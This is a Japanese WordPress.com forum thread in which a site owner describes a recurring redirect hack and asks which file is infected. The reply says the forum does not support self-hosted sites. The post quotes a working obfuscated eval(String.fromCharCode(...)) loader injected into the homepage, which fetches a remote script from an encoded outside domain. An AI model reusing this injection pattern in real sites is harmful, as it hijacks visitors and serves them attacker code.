[マルウェア]何度やっても謎のコードが挿入され、リダイレクトされる
-
はじめまして。今回はワードプレスのハッキングとリダイレクトマルウェアについて質問させていただきます。
3日前、当サイトは一度現在起こっているのと似たようなリダイレクト被害に遭いました(主にkinonew.proというサイトに飛んでいるようでした)。
その際、四苦八苦しながらコードを探そうとは努力したのですが、headerにもfooterにもindexにもhtaccess、functions等にも怪しいスクリプトを発見することはできませんでした。その際は諦めてワードプレスの再インストールを行い、鯖管理画面とワードプレスログインのパスを変更、wordfenceを導入するという対策を取りました。その結果、ここ二日ほどは
正常なサイトに戻っていました。しかし今朝見ると症状は再発。リダイレクトする直前のトップページのソースを見ると、
<style scoped></style>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 49, 54, 44, 32, 49, 49, 52, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 49, 54, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 57, 55, 44, 32, 49, 49, 48, 44, 32, 49, 48, 48, 44, 32, 49, 48, 53, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 52, 55, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 112, 108, 46, 106, 115, 63, 102, 49, 61, 116, 114, 121, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</style>if (window.addthis_product === undefined) { window.addthis_product = "wpp"; } if (window.wp_product_version === undefined) { window.wp_product_version = "wpp-6.2.3"; } if (window.wp_blog_version === undefined) { window.wp_blog_version = "5.2.1"; } if (window.addthis_share === undefined) { window.addthis_share = {}; } if (window.addthis_config === undefined) { window.addthis_config = {"data_track_clickback":true,"ignore_server_config":true,"ui_atversion":"300"}; } if (window.addthis_layers === undefined) { window.addthis_layers = {}; } if (window.addthis_layers_tools === undefined) { window.addthis_layers_tools = []; } else { } if (window.addthis_plugin_info === undefined) { window.addthis_plugin_info = {"info_status":"enabled","cms_name":"WordPress","plugin_name":"Share Buttons by AddThis","plugin_version":"6.2.3","plugin_mode":"WordPress","anonymous_profile_id":"wp-fa027ccd14ebf8244c319b82865e6263","php_version":"7.0.30","cms_version":"5.2.1","page_info":{"template":"home","post_type":""},"sharing_enabled_on_post_via_metabox":false}; }
(function() {
var first_load_interval_id = setInterval(function () {
if (typeof window.addthis !== 'undefined') {
window.clearInterval(first_load_interval_id);
if (typeof window.addthis_layers !== 'undefined' && Object.getOwnPropertyNames(window.addthis_layers).length > 0) {
window.addthis.layers(window.addthis_layers);
}
if (Array.isArray(window.addthis_layers_tools)) {
for (i = 0; i
という怪しいコードの存在を確認しました。しかし恥ずかしながら知識がなく、このコードが結局どのファイルにあたるのかわからないのです。〇前回・今回共にwordfence、exploitscanner、ワードプレスドクターなどの様々なセキュリティーソフトでスキャンをかけていますが、明らかにリダイレクトの症状が継続している中、脅威は一度も検出されませんでした。また、グーグルサーチコンソールも「問題はない」表記です。
〇重ね重ねお恥ずかしいのですが、バックアップもあまりとっておらず、現在手元には今年の1月分、最初にハッキングされた日の分、その後見た目上は治った時の分、そして現在の分しかありません。
こうした状況を踏まえまして、①どのファイルが怪しいのか ②仮に解決できたとして、今後どうしていくべきなのかの二点について、何卒ご教授のほどをよろしくお願いいたします。
ヘルプが必要なブログは (ログイン中のユーザーにのみ表示) です。
-
-
指定のサイトはWPXサーバーで運営されているWordPress.orgのサイトです。
このフォーラムは、米国のAutomattic社が運営するWordPress.comサーバーのサポートフォーラムです。このフォーラムでは wordpress.orgやWPXサーバーのサポートは行なっていません。
WordPress.com と WordPress.org の違い
WordPress.orgのクラッキング被害への対応は公式ドキュメントをご覧ください。
- トピック「[マルウェア]何度やっても謎のコードが挿入され、リダイレクトされる」には新しい返信をつけることはできません。
WordPress.com 日本語フォーラム 